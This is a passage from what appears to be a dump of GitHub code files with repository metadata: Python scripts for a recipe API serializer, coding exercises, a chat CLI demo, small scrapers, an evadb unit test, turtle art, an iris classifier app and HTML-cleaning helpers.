obj.recipes.count()\n\n\nclass FollowPostSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для создание запроса на подписку.\n \"\"\"\n\n class Meta:\n model = Follow\n fields = (\n 'author',\n 'user'\n )\n\n def validate(self, data):\n user_me = self.context['request'].user\n if user_me == data['author']:\n raise serializers.ValidationError(\n 'Нельзя подписываться на самого себя!'\n )\n if Follow.objects.filter(\n author=data['author'],\n user=user_me):\n raise serializers.ValidationError(\n f'Вы подписаны на автора {data[\"author\"]}!'\n )\n return data\n\n def to_representation(self, instance):\n return FollowSerializer(\n instance.author,\n context={'request': self.context.get('request')}\n ).data\n\n\nclass ShoppingCartSerializer(serializers.ModelSerializer):\n \"\"\"\n Сериализатор для списка покупок автора.\n \"\"\"\n\n class Meta:\n model = ShoppingCart\n fields = (\n 'user',\n 'recipe'\n )\n\n def validate(self, data):\n if ShoppingCart.objects.filter(\n user=data['user'],\n recipe=data['recipe']\n ):\n raise serializers.ValidationError(\n f'Рецепт - {data[\"recipe\"]} уже есть в списке покупок'\n )\n return data\n\n def to_representation(self, instance):\n return RecipeSerializer(instance.recipe).data\n","repo_name":"ElenaAntonenko/foodgram-project-react","sub_path":"backend/api/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":10757,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72706654194","text":"'''\nHow to reverse an integer\n\nDesign an efficient algorithm to reverse a given integer.\n\nExample:\n\ninput: 1234\noutput: 4321\n'''\n\n# Use the module operator to collect the last digit\n# Then use integer division to delete the last digit\n# build the new integer up tens-place by tens-place\ndef reverse_integer(n: int) -> int:\n reverse = 0\n remainder = 0\n \n while (n > 0):\n remainder = n % 10\n n = n // 10\n reverse = reverse * 10 + remainder\n return reverse\n\nif __name__ == '__main__':\n print(reverse_integer(12345678))","repo_name":"EandrewJones/algorithms","sub_path":"interview_questions/arrays/reverse_integer.py","file_name":"reverse_integer.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28124967662","text":"# coding=utf-8\n# Implements stream chat in command line for fine-tuned models.\n# Usage: python cli_demo.py --model_name_or_path path_to_model --checkpoint_dir path_to_checkpoint\n\n\nfrom utils import (\n Template,\n load_pretrained,\n prepare_infer_args,\n get_logits_processor\n)\nfrom threading import Thread\nfrom transformers import TextIteratorStreamer\n\n\ndef main():\n\n model_args, data_args, finetuning_args, generating_args = prepare_infer_args()\n # model_name = \"BLOOM\" if \"bloom\" in model_args.model_name_or_path else \"LLaMA\"\n model_name = \"仲景\"\n model, tokenizer = load_pretrained(model_args, finetuning_args)\n\n prompt_template = Template(data_args.prompt_template)\n streamer = TextIteratorStreamer(tokenizer, timeout=60.0, skip_prompt=True, skip_special_tokens=True)\n\n def predict_and_print(query, history: list):\n input_ids = tokenizer([prompt_template.get_prompt(query, history)], return_tensors=\"pt\")[\"input_ids\"]\n input_ids = input_ids.to(model.device)\n\n gen_kwargs = generating_args.to_dict()\n gen_kwargs[\"input_ids\"] = input_ids\n gen_kwargs[\"logits_processor\"] = get_logits_processor()\n gen_kwargs[\"streamer\"] = streamer\n\n thread = Thread(target=model.generate, kwargs=gen_kwargs)\n thread.start()\n response = \"\"\n print(\"{}: \".format(model_name), end=\"\")\n for new_text in streamer:\n print(new_text, end=\"\", flush=True)\n response += new_text\n print()\n history = history + [(query, response)]\n return history\n\n history = []\n print(\"欢迎使用 {} 模型,输入内容即可对话,clear清空对话历史,stop终止程序\".format(model_name))\n while True:\n try:\n query = input(\"\\nInput: \")\n except UnicodeDecodeError:\n print(\"Detected decoding error at the inputs, please set the terminal encoding to utf-8.\")\n continue\n except Exception:\n raise\n\n if query.strip() == \"stop\":\n break\n\n if query.strip() == \"clear\":\n history = []\n print(\"History has been removed.\")\n continue\n\n history = predict_and_print(query, history)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Zlasejd/HuangDI","sub_path":"src/cli_demo.py","file_name":"cli_demo.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"39"} +{"seq_id":"10611437673","text":"#Change user-agent to anything appropriate\n# Get links of reference webpages stored in a .json file\n#print out image links from given url\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\nimport re\nimport requests \n\n######## TASK 5\n#modded useragent\nfakeuseragent = { 'User-Agent': \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 AppleWebKit/537.36 (KHTML, like Gecko)\"}\nmoduseragent = { 'user-Agent':\"Mobile\"}\n\n#set target webpage\nurl = 'http://172.18.58.238/headers.php'\n\n##\ndef Task5():\n\n #GET\n r = requests.Session()\n request = r.get(url, headers=fakeuseragent)\n statusCode = request.status_code\n #header\n header = request.headers\n\n #to change header type to mobile\n header.update(moduseragent)\n new_request = r.get(url, headers=header)\n\n\n Task5File = open(\"task5.txt\", \"w\")\n Task5File.write(f\"{request.status_code}\\n{header}\\n$$$ Modded: \\n{moduseragent}\\n{new_request.headers}\")\n\n if statusCode == 200:\n print(\"OK\")\n else:\n print(\"Error status code: %s\"%statusCode)\n print(\"\\n$$$ Modded: \\n\", moduseragent)\n print(new_request.headers)\n\nclass parseTask6(scrapy.Spider):\n\n name = 'task6'\n #test url\n start_urls = ['http://172.18.58.238/index.php']\n open(\"task6.json\", 'w').close()\n def parse(self, response):\n Task6 = open(\"task6.json\", 'a')\n for link in response.css('a'):\n link_results = link.css('a::attr(href)').get()\n Task6.write(str({'results': link_results})+\"\\n\")\n Task6.close()\n\n#image urls extractions\nclass parseImages(scrapy.Spider):\n img_list=[]\n name = 'task7'\n allowed_domains = ['172.18.58.238']\n \n start_urls = ['http://172.18.58.238/index.php']\n \n \n def parse(self, response):\n url = response.url \n for i in response.css('img::attr(src)').extract():\n if '.jpg':\n self.img_list.append(url + i)\n \n for u in response.css('img::attr(src)').extract():\n if u is not None:\n yield response.follow(u, callback=self.parse)\n\n \n\n print(img_list)\n \n \nTask5()\nprocess = CrawlerProcess()\nprocess.crawl(parseTask6)\nprocess.crawl(parseImages)\nprocess.start()","repo_name":"BAPESHOTZ/REPO-STUFFZ","sub_path":"scrapy.py","file_name":"scrapy.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"30315625650","text":"import re\nimport os\n\n\n#classified tweets according to hashtag\ndef isLeave(filename):\n\tleavePath = './labeled_tweets/leave'\n\tleaveTweets = open(leavePath, 'a')\n\tglobal leaveCnt\n\n\tremainPath = './labeled_tweets/remain'\n\tremainTweets = open(remainPath, 'a')\n\tglobal remainCnt\n\n\tsourcePath = './tweets_by_month/' + filename\n\n\twith open(sourcePath) as f:\n\t\tfor line in f:\n\t\t\tline = line.lower()\n\t\t\tline = re.sub(r'\\|\\~|\\`|\\!|\\$|\\%|\\^|\\&|\\*|\\(|\\)|\\-|\\_|\\+|\\=|\\||\\\\|\\[|\\]|\\{|\\}|\\;|\\:|\\\"|\\'|\\,|\\<|\\.|\\>|\\/|\\?', \" \", line)\n\t\t\tif re.search('#voteleave|#leave|#takecontrol|#leaveeu', line):\n\t\t\t\tleaveTweets.write(line)\n\t\t\t\tleaveCnt = leaveCnt + 1\n\t\t\tif re.search('#voteremain|#remain|#strongerin|#labourinforbritain|#intogether', line):\n\t\t\t\tremainTweets.write(line)\n\t\t\t\tremainCnt = remainCnt + 1\n\nif __name__=='__main__':\n\n\tleaveCnt = 0\n\tremainCnt = 0\n\tpath = './tweets_by_month/'\n\tfor root, dirs, files in os.walk(path):\n\t\tfor filename in files:\n\t\t\tisLeave(filename)\n\tprint(leaveCnt)\n\tprint(remainCnt)\n\n\n","repo_name":"BrexitProject/TweetsMining","sub_path":"isLeave.py","file_name":"isLeave.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"18633326936","text":"import os\nimport utils\nimport confmat\n\n\ndef quality_score(tp, tn, fp, fn):\n score = (tp + tn)/(tp + tn + 10*fp + fn)\n print(f\"found {tp} spams out of {tp+fn}, found {tn} hams out of {tn+fp}\")\n return score\n\n\ndef compute_quality_for_corpus(path):\n truth_dict = utils.read_classification_from_file(\n os.path.join(path, '!truth.txt'))\n pred_dict = utils.read_classification_from_file(\n os.path.join(path, '!prediction.txt'))\n cm = confmat.BinaryConfusionMatrix(pos_tag='SPAM', neg_tag='OK')\n cm.compute_from_dicts(truth_dict, pred_dict)\n return quality_score(**cm.as_dict())\n\n\nif __name__ == \"__main__\":\n print(compute_quality_for_corpus(os.path.join(\"data\", \"1\")))\n","repo_name":"radkop2000/SpamFilter","sub_path":"quality.py","file_name":"quality.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"24375269217","text":"'''\r\n1. Развернуть у себя на компьютере/виртуальной машине/хостинге MongoDB и реализовать функцию,\r\nзаписывающую собранные вакансии в созданную БД.\r\n'''\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs\r\nimport pandas as pd\r\nimport csv\r\nfrom pymongo import MongoClient\r\n\r\nheader = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'}\r\n\r\n\r\ndef get_data(zp):\r\n resp = requests.get(f'https://www.rabota.ru/?sort=relevance&min_salary={zp}', headers=header)\r\n soup = bs(resp.text, 'lxml')\r\n result = []\r\n w = soup.find_all(class_=\"vacancy-preview-card__title\")\r\n p = soup.find_all(class_=\"vacancy-preview-card__salary vacancy-preview-card__salary-blue\")\r\n for i in range(20):\r\n result.append({\r\n 'Вакансия': w[i].text.strip(),\r\n 'Зарплата': p[i].text.strip().replace('\\xa0', ' ')\r\n })\r\n print(result[i])\r\n pd.DataFrame(result).to_csv('dump.csv')\r\n\r\n\r\ndef to_mongo():\r\n client = MongoClient('localhost')\r\n db = client[\"test01\"]\r\n col = db[\"work\"]\r\n with open('dump.csv', 'r', encoding='utf-8') as read_obj:\r\n csv_reader = csv.DictReader(read_obj)\r\n mylist = csv_reader\r\n col.insert_many(mylist)\r\n\r\n\r\nget_data(80000) # Требуемая зарплата\r\nto_mongo()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"softicer-67/PARSING","sub_path":"Lesson_3/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1698504564","text":"# 1.3\n# URLify: Write a method to replace all spaces in a string with '%20'.\n# You may assume that the string has sufficient space at the end to hold the additional characters,\n# and that you are given the \"true\" length of the string.\n\n# using an additional data structure - O(n) time, O(n) space\ndef URLify(input_str, n):\n url_string = \"\"\n\n for i in range(n):\n if (input_str[i] == ' '):\n url_string += \"%20\"\n else:\n url_string += input_str[i]\n\n return url_string\n\nassert(URLify(\"Mr John Smith \", 13) == \"Mr%20John%20Smith\")\n\n# in-place - O(n) time, O(1) space\ndef URLify2(input_str, n):\n space_count = 0\n\n for i in range(n - 1, -1, -1):\n if (input_str[i] == ' '):\n space_count += 1\n\n shift = space_count * 2\n \n for i in range(n - 1, -1, -1):\n if (input_str[i] == ' '):\n input_str[i + shift] = '0'\n input_str[i + shift - 1] = '2'\n input_str[i + shift - 2] = '%'\n shift -= 2\n else:\n input_str[i + shift] = input_str[i]\n\n return input_str\n\n# because Python strings are immutable, a list is inputted instead of a string\nassert(URLify2(list(\"Mr John Smith \"), 13) == list(\"Mr%20John%20Smith\")) \n\nprint(\"Passed.\")","repo_name":"carterkelly9/CtCI","sub_path":"arrays-and-strings/URLify.py","file_name":"URLify.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"25055104686","text":"import sys\nt = int(input())\n\nf = [0] * 10001\nf[1] = 1\nf[2] = 1\n\nfor j in range(3, 10001):\n f[j] = f[j-1] + f[j-2]\n\nfor i in range(t):\n p, q = map(int, sys.stdin.readline().split())\n print(f\"Case #{i+1}: {f[p]%q}\")\n","repo_name":"oRE-o/Problem-Solving","sub_path":"9711_피보나치.py","file_name":"9711_피보나치.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"6888404888","text":"import unittest\nfrom test.unit_tests.executor.utils import DummyExecutor\n\nimport numpy as np\nimport pandas as pd\nfrom mock import MagicMock\n\nfrom evadb.executor.limit_executor import LimitExecutor\nfrom evadb.executor.orderby_executor import OrderByExecutor\nfrom evadb.expression.constant_value_expression import ConstantValueExpression\nfrom evadb.expression.tuple_value_expression import TupleValueExpression\nfrom evadb.models.storage.batch import Batch\nfrom evadb.parser.types import ParserOrderBySortType\nfrom evadb.plan_nodes.limit_plan import LimitPlan\nfrom evadb.plan_nodes.orderby_plan import OrderByPlan\n\n\nclass LimitExecutorTest(unittest.TestCase):\n def test_should_return_smaller_num_rows(self):\n dfs = [\n pd.DataFrame(np.random.randint(0, 100, size=(100, 4)), columns=list(\"ABCD\"))\n for _ in range(4)\n ]\n\n batches = [Batch(frames=df) for df in dfs]\n\n limit_value = 125\n\n plan = LimitPlan(ConstantValueExpression(limit_value))\n\n limit_executor = LimitExecutor(MagicMock(), plan)\n limit_executor.append_child(DummyExecutor(batches))\n reduced_batches = list(limit_executor.exec())\n\n total_size = 0\n for batch in reduced_batches:\n total_size += len(batch)\n\n self.assertEqual(total_size, limit_value)\n\n def test_should_return_limit_greater_than_size(self):\n \"\"\"This should return the exact same data\n if the limit value is greater than what is present.\n This will also leave a warning\"\"\"\n\n dfs = [\n pd.DataFrame(np.random.randint(0, 100, size=(100, 4)), columns=list(\"ABCD\"))\n for _ in range(4)\n ]\n\n batches = [Batch(frames=df) for df in dfs]\n\n previous_total_size = 0\n for batch in batches:\n previous_total_size += len(batch)\n\n limit_value = 500\n\n plan = LimitPlan(ConstantValueExpression(limit_value))\n\n limit_executor = LimitExecutor(MagicMock(), plan)\n limit_executor.append_child(DummyExecutor(batches))\n reduced_batches = list(limit_executor.exec())\n\n after_total_size = 0\n for batch in reduced_batches:\n after_total_size += len(batch)\n\n self.assertEqual(previous_total_size, after_total_size)\n\n def test_should_return_top_frames_after_sorting(self):\n \"\"\"\n Checks if limit returns the top 2 rows from the data\n after sorting\n\n data (3 batches):\n 'A' 'B' 'C'\n [1, 1, 1]\n ----------\n [1, 5, 6]\n [4, 7, 10]\n ----------\n [2, 9, 7]\n [4, 1, 2]\n [4, 2, 4]\n \"\"\"\n\n df1 = pd.DataFrame(np.array([[1, 1, 1]]), columns=[\"A\", \"B\", \"C\"])\n df2 = pd.DataFrame(np.array([[1, 5, 6], [4, 7, 10]]), columns=[\"A\", \"B\", \"C\"])\n df3 = pd.DataFrame(\n np.array([[2, 9, 7], [4, 1, 2], [4, 2, 4]]), columns=[\"A\", \"B\", \"C\"]\n )\n\n batches = [Batch(frames=df) for df in [df1, df2, df3]]\n\n \"query: .... ORDER BY A ASC, B DESC limit 2\"\n\n plan = OrderByPlan(\n [\n (TupleValueExpression(col_alias=\"A\"), ParserOrderBySortType.ASC),\n (TupleValueExpression(col_alias=\"B\"), ParserOrderBySortType.DESC),\n ]\n )\n\n orderby_executor = OrderByExecutor(MagicMock(), plan)\n orderby_executor.append_child(DummyExecutor(batches))\n\n sorted_batches = list(orderby_executor.exec())\n\n limit_value = 2\n plan = LimitPlan(ConstantValueExpression(limit_value))\n limit_executor = LimitExecutor(MagicMock(), plan)\n limit_executor.append_child(DummyExecutor(sorted_batches))\n reduced_batches = list(limit_executor.exec())\n\n # merge everything into one batch\n aggregated_batch = Batch.concat(reduced_batches, copy=False)\n \"\"\"\n A B C\n 0 1 5 6\n 1 1 1 1\n \"\"\"\n\n expected_df1 = pd.DataFrame(\n np.array([[1, 5, 6], [1, 1, 1]]), columns=[\"A\", \"B\", \"C\"]\n )\n\n expected_batches = [Batch(frames=df) for df in [expected_df1]]\n\n self.assertEqual(expected_batches[0], aggregated_batch)\n","repo_name":"georgia-tech-db/evadb","sub_path":"test/unit_tests/executor/test_limit_executor.py","file_name":"test_limit_executor.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":2438,"dataset":"github-code","pt":"39"} +{"seq_id":"21346829393","text":"import turtle\r\nimport random\r\nimport time\r\n\r\ndef rotl(l, y=1):\r\n if len(l) == 0:\r\n return l\r\n y = y % len(l)\r\n return l[y:] + l[:y]\r\n\r\ndef rotr(l, y=1):\r\n if len(l) == 0:\r\n return l\r\n y = -y % len(l)\r\n return l[y:] + l[:y]\r\n\r\ndef dec2bin(i):\r\n str=\"{0:b}\".format(i)\r\n while len(str)<8:\r\n str='0'+str\r\n num=[0]*8\r\n for i in range(8):\r\n if str[i]=='0':\r\n num[i]=0\r\n else:\r\n num[i]=1\r\n return num\r\n\r\ndef vecadd(a,b):\r\n n=len(a)\r\n m=len(b)\r\n if n==1 and m==1:\r\n res=[a[0]+b[0]]\r\n else:\r\n if n==1:\r\n a=a*len(b)\r\n k=len(b)\r\n else:\r\n b=b*len(a)\r\n k=len(a)\r\n res=[0]*k\r\n for i in range(k):\r\n res[i]=a[i]+b[i]\r\n return res\r\n\r\ndef xshapes(aTurtle,B,size,sym):\r\n angle=360/sym\r\n aTurtle.goto(0,0)\r\n for j in range(sym):\r\n aTurtle.up()\r\n aTurtle.forward(size)\r\n aTurtle.down()\r\n X=aTurtle.xcor()\r\n Y=aTurtle.ycor()\r\n for k in range(len(B)):\r\n if B[k-1]==1:\r\n aTurtle.left(angle)\r\n else:\r\n aTurtle.right(angle)\r\n aTurtle.forward(size)\r\n aTurtle.pencolor(\"lightgray\")\r\n aTurtle.goto(X,Y)\r\n aTurtle.pencolor(\"black\")\r\n\r\ndef vecsub(a,b):\r\n n=len(a)\r\n m=len(b)\r\n if n==1 and m==1:\r\n res=[a[0]-b[0]]\r\n else:\r\n if n==1:\r\n a=a*len(b)\r\n k=len(b)\r\n else:\r\n b=b*len(a)\r\n k=len(a)\r\n res=[0]*k\r\n for i in range(k):\r\n res[i]=a[i]-b[i]\r\n return res\r\n\r\ndef vecmul(a,b):\r\n n=len(a)\r\n m=len(b)\r\n if n==1 and m==1:\r\n res=[a[0]*b[0]]\r\n else:\r\n if n==1:\r\n a=a*len(b)\r\n k=len(b)\r\n else:\r\n b=b*len(a)\r\n k=len(a)\r\n res=[0]*k\r\n for i in range(k):\r\n res[i]=a[i]*b[i]\r\n return res\r\n\r\ndef CAstep(x,rule):\r\n r=dec2bin(rule)\r\n a=vecsub([8],vecadd(rotl(x),vecmul([2],vecadd(x,vecmul([2],rotr(x))))))\r\n n=len(x)\r\n res=[0]*n\r\n for i in range(n): \r\n res[i]=(r[a[i]-1])\r\n return res\r\n\r\ndef rules(n):\r\n bestrules=[18,22,26,28,30,45,50,54,57,58,60,62,70,73,75,78,82,86,89,90,92,94,99,101,102,105,109,110,114,118,122,124,126,129,131,133,\r\n 135,137,141,145,146,147,149,150,153,154,156,157,158,161,163,165,167,169,177,178,179,181,182,186,188,190,193,195,197,\r\n 198,199,210,214,218,225,230,242,246,250]\r\n return bestrules[n]\r\n\r\ndef main():\r\n S=input(\"symmetry \") # Order of symmetry (>3)\r\n symmetry=int(S)\r\n R=input(\"rule \") # Cellular automaton rule(0-255)\r\n rule=rules(int(R)) \r\n G=input(\"generations \") # Number of cellular automaton generations (>0)\r\n generations=int(G)+1 \r\n L=input(\"contour length \") # Length of contour bit string\r\n length=int(L)\r\n Z=input(\"segment size \") # Length of line segments in pixels\r\n size=int(Z) \r\n#\r\n B=[0]*length # \"Standard\" initial conditions\r\n B[int(length/2)]=1\r\n#\r\n tom=turtle.Pen() \r\n tom.speed(0)\r\n turtle.bgcolor(\"white\") # Background color\r\n tom.pencolor(\"black\") # Line color\r\n tom.pensize(1) # Line width\r\n#\r\n for i in range(generations):\r\n tom.hideturtle() \r\n xshapes(tom,B,size,symmetry)\r\n tom.up()\r\n tom.goto(-300,-300)\r\n tom.down()\r\n ID=str(symmetry)+' '+str(int(R))+' '+str(i)+' '+str(length)+' '+str(size)\r\n tom.write(ID,align=\"left\",font=(\"Arial\",16,\"normal\")) \r\n filename='xfamily'+str(i)+'.ps'\r\n turtle.getscreen().getcanvas().postscript(file=filename)\r\n time.sleep(2)\r\n tom.reset()\r\n B=CAstep(B,rule) \r\nmain()\r\n","repo_name":"mohmaj/ArtOfCoding","sub_path":"Chapter 3 Coding for Art/3.3 Abstract Art/3.3.3 Geometric art with Python: adult colouring book series/xfamily.py","file_name":"xfamily.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"} +{"seq_id":"40738350911","text":"import streamlit as st\r\nfrom sklearn.datasets import load_iris\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\n# Load the iris dataset\r\niris = load_iris()\r\nX = iris.data\r\ny = iris.target\r\n\r\n# Split the data into training and test sets\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\r\n\r\n# Train a decision tree classifier\r\nclf = DecisionTreeClassifier()\r\nclf.fit(X_train, y_train)\r\n\r\n# Create a Streamlit app\r\nst.title('Iris Species Prediction App')\r\n\r\n# Create sliders for input features\r\nsepal_length = st.slider('Sepal Length', min_value=4.0, max_value=8.0, value=5.0)\r\nsepal_width = st.slider('Sepal Width', min_value=2.0, max_value=5.0, value=3.0)\r\npetal_length = st.slider('Petal Length', min_value=1.0, max_value=7.0, value=4.0)\r\npetal_width = st.slider('Petal Width', min_value=0.1, max_value=3.0, value=1.0)\r\n\r\n# Predict the species of the iris\r\nfeatures = [[sepal_length, sepal_width, petal_length, petal_width]]\r\nprediction = clf.predict(features)\r\nst.subheader(f'The species of the iris is predicted to be: {iris.target_names[prediction][0]}')\r\n","repo_name":"gitlearner246/streamlit_test","sub_path":"iris.py","file_name":"iris.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6370399722","text":"import re\nfrom operator import itemgetter\n\nimport jieba\nimport zhon.hanzi as chinese\nimport weibo_reader.weiboReader_LineByLine as wr\n\nre_chinese = re.compile('[%s]' % chinese.characters)\n\n\ndef jieba_tokenizer(doc):\n tokens = jieba.cut(doc)\n return [word for word in tokens\n if len(word) > 1\n and re_chinese.match(word)]\n\n\nweiboes = wr.Weibo_Reader_Line_by_Line(r\"../data/weibo.csv\")\ntexts = (item.content for item in weiboes.weibo_items())\njieba_results = (jieba_tokenizer(text) for text in texts)\ndic = dict()\nfor words in jieba_results:\n for word in words:\n dic[word] = dic.get(word, 0) + 1\nsorted_dic = sorted(dic.items(), key=itemgetter(1), reverse=True)\nwith open(r\"..\\data\\word_frequency.txt\", \"w\", encoding=\"utf-8\") as out_f:\n for k, v in sorted_dic:\n out_f.write(\"%s:%d\\n\" % (k, v))\n","repo_name":"KindRoach/SocialOnInternet","sub_path":"weibo_reader/word_frequency.py","file_name":"word_frequency.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"4695788738","text":"#encoding:UTF-8\nimport os\nimport re\nimport sys\nfrom bs4 import BeautifulSoup\nfrom urllib import request\n\ndef getHtml(url):\n\thtmlDoc = request.urlopen(url).read()\n\thtmlDoc = htmlDoc.decode('UTF-8')\n\treturn htmlDoc\n\ndef removeScript(soup):\n\tfor script in soup.find_all('script'):\n\t\tscript.decompose()\n\treturn soup\n\ndef removeTag(soup, tagname, attribute_name, atribute_value_array):\n\tfor attribute_value in atribute_value_array:\n\t\tfor tag in soup.findAll(tagname, {attribute_name : attribute_value}):\n\t\t\ttag.decompose()\n\treturn soup\n\ndef removeSegmentFaultTag(soup):\n\tsoup = removeTag(soup, \"div\", \"class\",\n\t\t\t[\"col-md-4\", \"clearfix mt10\", \"widget-box\", \"recommend-post\", \"text-center mt10\", \"global-navTags\",\n\t\t\t\"post-topheader custom-\", \"global-nav sf-header\", \"app-promotion-bar\", \"widget-comments hidden\", \"modal\",\n\t\t\t\"hidden widget-register widget-welcome-question mt20 hidden-xs widget-welcome widget-register-slideUp\",\n\t\t\t\"modal widget-911\", \"col-xs-12 col-md-3 side\"])\n\tsoup = removeTag(soup, \"img\", \"id\", ['icon4weChat', 'icon4weChat'])\n\tsoup = removeTag(soup, \"div\", \"id\", [\"fixedTools\"])\n\tsoup = removeTag(soup, \"footer\", \"id\", [\"footer\"])\n\tsoup = removeTag(soup, \"h2\", \"class\", ['h4 post-comment-title'])\n\treturn soup\n\ndef removeJobboleTag(soup):\n\tnav_classes = [\"menu-nav\", \"grid-12 menu-nav\"]\n\tfor navclass in nav_classes:\n\t\tnav = soup.find(\"nav\", {\"class\": navclass})\n\t\tif nav is not None:\n\t\t\tnav.decompose()\n\tdiv_classes = [\"header-wrapper\", \"grid-4\", \"wp_rp_wrap wp_rp_plain\",\n\t\"dot-box center-align\", \"author-bio-info\", \"navigation margin-20\",\n\t\"post-adds\", \"comments\", \"entry-meta\", \"copyright-area\", \"crayon-toolbar\", \"crayon-main\"]\n\tfor divclass in div_classes:\n\t\tfor div in soup.findAll(\"div\", {\"class\": divclass}):\n\t\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"full-btm\"})\n\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"full-top\"})\n\tif div is not None:\n\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"author-bio\"})\n\tif div is not None:\n\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"rewardbox\"})\n\tif div is not None:\n\t\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"id\": \"breadcrumb\"})\n\tdiv.decompose()\n\tdiv = soup.find(\"div\", {\"style\": \"text-align: left;\"})\n\tdiv.decompose()\n\tblockquote = soup.find(\"blockquote\", {\"class\": \"rewards\"})\n\tif blockquote is not None:\n\t\tblockquote.decompose()\n\tfooter = soup.find(\"footer\")\n\tfooter.decompose()\n\tstyle = soup.find(\"style\")\n\tstyle.decompose()\n\tfor textwidget in soup.findAll(\"div\", {\"class\": \"textwidget\"}):\n\t\ttextwidget.decompose()\n\tfor meta in soup.findAll('link'):\n\t\tmeta.decompose()\n\treturn soup\n\ndef removeInfoQCN(soup):\n\tdiv_ides = [\"topInfo\", \"header\", \"contentRatingWidget\", \"comment_here\", \"footer\",\n\t\"forceUpdate_inline\", \"replyPopup\", \"id_geo_banner\", \"forceProfileUpdateArea\", \"overlay_comments\",\n\t\"editCommentPopup\", \"messagePopup\", \"responseContent\"]\n\tfor divid in div_ides:\n\t\tfor div in soup.findAll(\"div\", {\"id\": divid}):\n\t\t\tdiv.decompose()\n\tdiv_classes = [\"related_sponsors visible stacked\", \"random_links\", \"clear\", \"comments\",\n\t\"all_comments\", \"newsletter \", \"bottomContent\", \"login_overlay\", \"article_page_right\",\n\t\"related_sponsors relEdRelRes\", \"intbt\", \"related_sponsors wholething\"]\n\tfor divclass in div_classes:\n\t\tfor div in soup.findAll(\"div\", {\"class\": divclass}):\n\t\t\tdiv.decompose()\n\tspan = soup.find(\"span\", {\"class\": \"author_general\"})\n\tif span is not None:\n\t\tspan.decompose()\n\ta = soup.find(\"a\", {\"class\": \"comments_like\"})\n\tif a is not None:\n\t\ta.decompose()\n\tul = soup.find(\"ul\", {\"class\": \"sh_t\"})\n\tif ul is not None:\n\t\tul.decompose()\n\tfor meta in soup.findAll('link'):\n\t\tmeta.decompose()\n\treturn soup\n\ndef removeITEBlog(soup):\n\tdiv_classes = [\"navbar\", \"banner banner-site\", \"speedbar\", \"tongji\", \"QRcode\", \"comt-title\", \"relates\",\n\t\"widget widget_text\", \"no_webshot\", \"article-social\", \"related_top\", \"banner banner-related\", \"banner banner-comment\",\n\t\"announcement\", \"meta\", \"no_bullets\"\n\t]\n\tfor divclass in div_classes:\n\t\tfor div in soup.findAll(\"div\", {\"class\": divclass}):\n\t\t\tdiv.decompose()\n\tdiv_ides = [\"postcomments\"]\n\tfor divid in div_ides:\n\t\tfor div in soup.findAll(\"div\", {\"id\": divid}):\n\t\t\tdiv.decompose()\n\tfor header in soup.findAll(\"header\", {\"class\": \"header\"}):\n\t\theader.decompose()\n\taside = soup.find(\"aside\")\n\tif aside is not None:\n\t\taside.decompose()\n\tnav = soup.find(\"nav\")\n\tif nav is not None:\n\t\tnav.decompose()\n\tspan = soup.find(\"span\", {\"style\": \"margin-top: 15px; color:red; display:block;text-align:center;\"})\n\tif span is not None:\n\t\tspan.decompose()\n\tfor footer in soup.findAll(\"footer\"):\n\t\tfooter.decompose()\n\treturn soup\n\ndef removeTag(soup, tagname, attribute_name, atribute_value_array):\n\tfor attribute_value in atribute_value_array:\n\t\tfor tag in soup.findAll(tagname, {attribute_name : attribute_value}):\n\t\t\ttag.decompose()\n\treturn soup\n\ndef removeIBMTag(soup):\n\tsoup = removeTag(soup, \"div\", \"class\", \n\t\t[\"dw-home-band\", \"ibm-access\", \"ibm-col-6-2 dw-toc-margin\", \"dw-footer-columns\", \"ibm-col-6-2\",\n\t \"ibm-container ibm-alternate ibm-buttons-last\", \"ibm-common-overlay\", 